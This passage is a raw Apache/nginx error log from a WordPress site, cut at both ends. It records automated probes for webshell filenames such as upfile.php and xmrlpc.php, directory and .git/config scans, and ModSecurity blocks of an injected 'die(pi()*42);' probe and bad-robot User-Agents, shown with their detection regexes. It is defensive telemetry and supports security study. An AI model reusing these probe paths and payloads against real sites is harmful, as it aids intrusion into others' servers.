9098:tid 140166351095552] [client 85.203.21.9:60938] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Oct 17 03:50:56.035386 2024] [autoindex:error] [pid 9096:tid 140166173775616] [client 85.203.21.9:60970] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Thu Oct 17 03:50:57.509250 2024] [autoindex:error] [pid 9096:tid 140166207346432] [client 85.203.21.9:60974] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Thu Oct 17 03:52:14.507363 2024] [:error] [pid 9210:tid 140166224131840] [client 85.203.21.9:32870] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Thu Oct 17 03:52:18.808264 2024] [autoindex:error] [pid 9096:tid 140166224131840] [client 85.203.21.9:32878] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Oct 17 03:52:41.896857 2024] [:error] [pid 9210:tid 140166115026688] [client 85.203.21.9:33014] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 17 03:52:54.685205 2024] [autoindex:error] [pid 9210:tid 140166249309952] [client 85.203.21.9:33096] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Oct 17 03:52:54.954938 2024] [:error] [pid 9210:tid 140166215739136] [client 85.203.21.9:33098] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Oct 17 03:53:01.160904 2024] [:error] [pid 9210:tid 140166123419392] [client 85.203.21.9:33134] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Thu Oct 17 03:53:01.416814 2024] [:error] [pid 9210:tid 140166207346432] [client 85.203.21.9:33138] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Thu Oct 17 03:53:08.875938 2024] [:error] [pid 9210:tid 140166215739136] [client 85.203.21.9:33186] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 17 03:53:37.910660 2024] [autoindex:error] [pid 9096:tid 140166131812096] [client 85.203.21.9:33368] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/17 03:53:56 [error] 9059#9059: *415912 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.203.21.9, server: investigacionperu.com, request: "GET /.well-known/pki-validation/?p= HTTP/1.1", host: "investigacionperu.com" [Thu Oct 17 03:58:17.968250 2024] [autoindex:error] [pid 9210:tid 140166098241280] [client 85.203.21.56:34694] AH01276: Cannot serve directory /home/investig/public_html/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/css/index.php [Thu Oct 17 03:58:25.113697 2024] [autoindex:error] [pid 9210:tid 140166257702656] [client 85.203.21.56:34860] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/maint/index.php [Thu Oct 17 03:58:38.893985 2024] [autoindex:error] [pid 9210:tid 140166207346432] [client 85.203.21.56:35126] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/uploads/index.php [Thu Oct 17 03:58:41.361820 2024] [autoindex:error] [pid 9210:tid 140166140204800] [client 85.203.21.56:35164] AH01276: Cannot serve directory /home/investig/public_html/wp-content/languages/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-content/languages/index.php [Thu Oct 17 03:58:41.654784 2024] [:error] [pid 9210:tid 140166115026688] [client 85.203.21.56:35170] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/moon.php [Thu Oct 17 03:58:49.469733 2024] [autoindex:error] [pid 9210:tid 140166215739136] [client 85.203.21.56:35294] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/js/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/js/index.php [Thu Oct 17 03:59:01.749440 2024] [autoindex:error] [pid 9210:tid 140166089848576] [client 85.203.21.56:35474] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/assets/index.php [Thu Oct 17 03:59:28.724606 2024] [autoindex:error] [pid 9098:tid 140166140204800] [client 85.203.21.67:35724] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/images/index.php [Thu Oct 17 03:59:33.871680 2024] [autoindex:error] [pid 9210:tid 140166165382912] [client 85.203.21.67:35758] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/index.php [Thu Oct 17 03:59:35.971986 2024] [autoindex:error] [pid 9098:tid 140166156990208] [client 85.203.21.67:35780] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/index.php [Thu Oct 17 03:59:45.211171 2024] [autoindex:error] [pid 9096:tid 140166182168320] [client 85.203.21.67:35854] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/blue/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 04:00:24.781412 2024] [autoindex:error] [pid 9210:tid 140166106633984] [client 85.203.21.67:36068] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/rest-api/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/rest-api/index.php 2024/10/17 04:00:54 [error] 9059#9059: *417561 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.203.21.67, server: investigacionperu.com, request: "GET /.well-known/pki-validation/ HTTP/1.1", host: "investigacionperu.com" [Thu Oct 17 04:01:01.825929 2024] [autoindex:error] [pid 9096:tid 140166115026688] [client 85.203.21.67:36250] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/SimplePie/index.php [Thu Oct 17 04:01:05.979181 2024] [autoindex:error] [pid 9210:tid 140166131812096] [client 85.203.21.67:36268] AH01276: Cannot serve directory /home/investig/public_html/.well-known/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 04:01:21.877592 2024] [autoindex:error] [pid 9210:tid 140166106633984] [client 85.203.21.67:36352] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/colors/coffee/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-admin/css/colors/coffee/index.php [Thu Oct 17 04:01:30.138282 2024] [:error] [pid 9096:tid 140166115026688] [client 85.203.21.67:36396] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/xmrlpc.php [Thu Oct 17 04:01:58.708803 2024] [autoindex:error] [pid 9210:tid 140166351095552] [client 85.203.21.67:36528] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/fonts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/fonts/index.php [Thu Oct 17 04:02:01.119944 2024] [autoindex:error] [pid 9210:tid 140166156990208] [client 85.203.21.67:36542] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/css/index.php [Thu Oct 17 04:03:47.532465 2024] [:error] [pid 9210:tid 140166240917248] [client 85.203.21.49:36958] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/admin.php [Thu Oct 17 04:03:53.719369 2024] [autoindex:error] [pid 9210:tid 140166131812096] [client 85.203.21.49:36986] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/ID3/index.php [Thu Oct 17 04:04:19.528744 2024] [:error] [pid 9096:tid 140166156990208] [client 85.203.21.49:37062] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 17 04:04:31.133218 2024] [autoindex:error] [pid 9210:tid 140166224131840] [client 85.203.21.49:37090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/js/tinymce/plugins/compat3x/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: http://investigacionperu.com/wp-includes/js/tinymce/plugins/compat3x/css/index.php [Thu Oct 17 04:04:31.379807 2024] [:error] [pid 9210:tid 140166148597504] [client 85.203.21.49:37092] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/index.php [Thu Oct 17 04:04:37.286442 2024] [:error] [pid 9096:tid 140166173775616] [client 85.203.21.49:37108] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/file.php [Thu Oct 17 04:04:37.619691 2024] [:error] [pid 9096:tid 140166098241280] [client 85.203.21.49:37110] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/upfile.php [Thu Oct 17 04:04:45.940307 2024] [:error] [pid 9210:tid 140166115026688] [client 85.203.21.49:37130] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/cloud.php [Thu Oct 17 04:05:17.587851 2024] [autoindex:error] [pid 9210:tid 140166351095552] [client 85.203.21.49:37210] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive 2024/10/17 04:05:34 [error] 9060#9060: *418073 directory index of "/usr/local/apache/autossl_tmp/.well-known/acme-challenge/" is forbidden, client: 85.203.21.49, server: investigacionperu.com, request: "GET /.well-known/pki-validation/?p= HTTP/1.1", host: "investigacionperu.com" [Thu Oct 17 10:01:06.211759 2024] [:error] [pid 9210:tid 140166190561024] [client 45.227.254.34:45088] [client 45.227.254.34] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:\\\\b(?:(?:s(?:t(?:d(?:dev(_pop|_samp)?)?|r(?:_to_date|cmp))|u(?:b(?:str(?:ing(_index)?)?|(?:dat|tim)e)|m)|e(?:c(?:_to_time|ond)|ssion_user)|ys(?:tem_user|date)|ha(1|2)?|oundex|chema|ig?n|pace|qrt)|i(?:s(null|_(free_lock|ipv4_compat|ipv4_mapped|ipv4| ..." at ARGS:1. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "125"] [id "950001"] [rev "2"] [msg "SQL Injection Attack"] [data "Matched Data: pi( found within ARGS:1: die(pi()*42);"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.9"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "investigacionperu.com"] [uri "/wp-content/plugins/easyrotator-for-wordpress/c.php"] [unique_id "ZxEmsn7z27a5GEdJixxA4wAAAMs"] [Thu Oct 17 22:54:06.680037 2024] [autoindex:error] [pid 9096:tid 140166198953728] [client 87.120.113.120:38754] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 22:54:13.734854 2024] [autoindex:error] [pid 14206:tid 140166165382912] [client 87.120.113.120:38762] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 22:55:22.285494 2024] [autoindex:error] [pid 9096:tid 140166140204800] [client 87.120.113.120:38858] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 22:56:02.110881 2024] [autoindex:error] [pid 14206:tid 140166156990208] [client 87.120.113.120:38922] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 22:56:13.813501 2024] [:error] [pid 14206:tid 140166148597504] [client 87.120.113.120:38934] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Thu Oct 17 22:56:31.380761 2024] [autoindex:error] [pid 9098:tid 140166240917248] [client 87.120.113.120:38960] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Thu Oct 17 22:56:37.225610 2024] [autoindex:error] [pid 14206:tid 140166140204800] [client 87.120.113.120:38964] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 01:56:09.341584 2024] [autoindex:error] [pid 9097:tid 140166140204800] [client 165.22.219.5:50978] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive, referer: binance.com [Fri Oct 18 06:39:05.075215 2024] [authz_core:error] [pid 17986:tid 139948741056256] [client 64.226.65.160:45882] AH01630: client denied by server configuration: /home/investig/public_html/server-status 2024/10/18 06:39:12 [error] 17389#17389: *461880 access forbidden by rule, client: 64.226.65.160, server: investigacionperu.com, request: "GET /.git/config HTTP/1.1", host: "www.investigacionperu.com" [Fri Oct 18 08:51:33.347306 2024] [autoindex:error] [pid 17986:tid 139948732663552] [client 87.120.113.59:56238] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:51:59.933615 2024] [autoindex:error] [pid 17986:tid 139948808197888] [client 87.120.113.59:56276] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/pomo/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:52:17.271542 2024] [autoindex:error] [pid 17986:tid 139948816590592] [client 87.120.113.59:56304] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/certificates/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:52:22.227988 2024] [autoindex:error] [pid 17426:tid 139948791412480] [client 87.120.113.59:56312] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:53:07.650017 2024] [autoindex:error] [pid 17427:tid 139948791412480] [client 87.120.113.59:56374] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:53:50.824949 2024] [autoindex:error] [pid 17426:tid 139948824983296] [client 87.120.113.59:56438] AH01276: Cannot serve directory /home/investig/public_html/wp-content/uploads/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 08:54:10.828831 2024] [:error] [pid 17986:tid 139948808197888] [client 87.120.113.59:56476] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/plugins.php [Fri Oct 18 08:54:26.128988 2024] [autoindex:error] [pid 17425:tid 139948766234368] [client 87.120.113.59:56552] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:55:14.532905 2024] [autoindex:error] [pid 17425:tid 139948799805184] [client 87.120.113.120:37546] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/maint/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:55:19.233155 2024] [autoindex:error] [pid 17427:tid 139948690700032] [client 87.120.113.120:37550] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:56:32.638088 2024] [autoindex:error] [pid 17427:tid 139948799805184] [client 87.120.113.120:37604] AH01276: Cannot serve directory /home/investig/public_html/wp-admin/images/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:57:06.582303 2024] [autoindex:error] [pid 17986:tid 139948741056256] [client 87.120.113.120:37634] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:57:19.193645 2024] [:error] [pid 17425:tid 139948665521920] [client 87.120.113.120:37638] File does not exist: /usr/local/apache/autossl_tmp/.well-known/acme-challenge/about.php [Fri Oct 18 10:57:37.886673 2024] [autoindex:error] [pid 17426:tid 139948673914624] [client 87.120.113.120:37656] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 10:57:44.407096 2024] [autoindex:error] [pid 17986:tid 139948783019776] [client 87.120.113.120:37666] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/css/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Fri Oct 18 12:29:35.791805 2024] [:error] [pid 17986:tid 139948690700032] [client 84.239.41.138:45448] [client 84.239.41.138] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?i:(?:c(?:o(?:n(?:t(?:entsmartz|actbot/)|cealed defense|veracrawler)|mpatible(?: ;(?: msie|\\\\.)|-)|py(?:rightcheck|guard)|re-project/1.0)|h(?:ina(?: local browse 2\\\\.|claw)|e(?:rrypicker|esebot))|rescent internet toolpak)|w(?:e(?:b(?: (?:downloader|by ..." at REQUEST_HEADERS:User-Agent. [file "/usr/local/apache/modsecurity-owasp-old/base_rules/modsecurity_crs_35_bad_robots.conf"] [line 